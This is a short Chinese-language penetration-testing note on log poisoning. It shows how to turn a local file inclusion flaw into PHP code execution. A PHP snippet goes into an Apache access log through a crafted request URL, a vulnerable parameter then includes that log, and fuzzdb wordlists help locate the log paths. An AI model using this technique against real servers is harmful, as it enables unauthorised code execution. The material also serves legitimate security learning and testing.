当我们发现一个本地文件包含漏洞却没有文件上传点时,也可以包含http日志
先访问http://192.168.1.1/<?php phpinfo();?> ,将一句话写入日志文件。
随后包含日志:/var/log/apache2/access.log,访问:
http://192.168.1.1/baohan.php?file=/var/log/apache2/access.log
如果不知道HTTP日志的保存位置,可以通过fuzz日志路径,推荐字典:
https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/lfi/common-unix-httpd-log-locations.txt
https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/lfi/common-ms-httpd-log-locations.txt
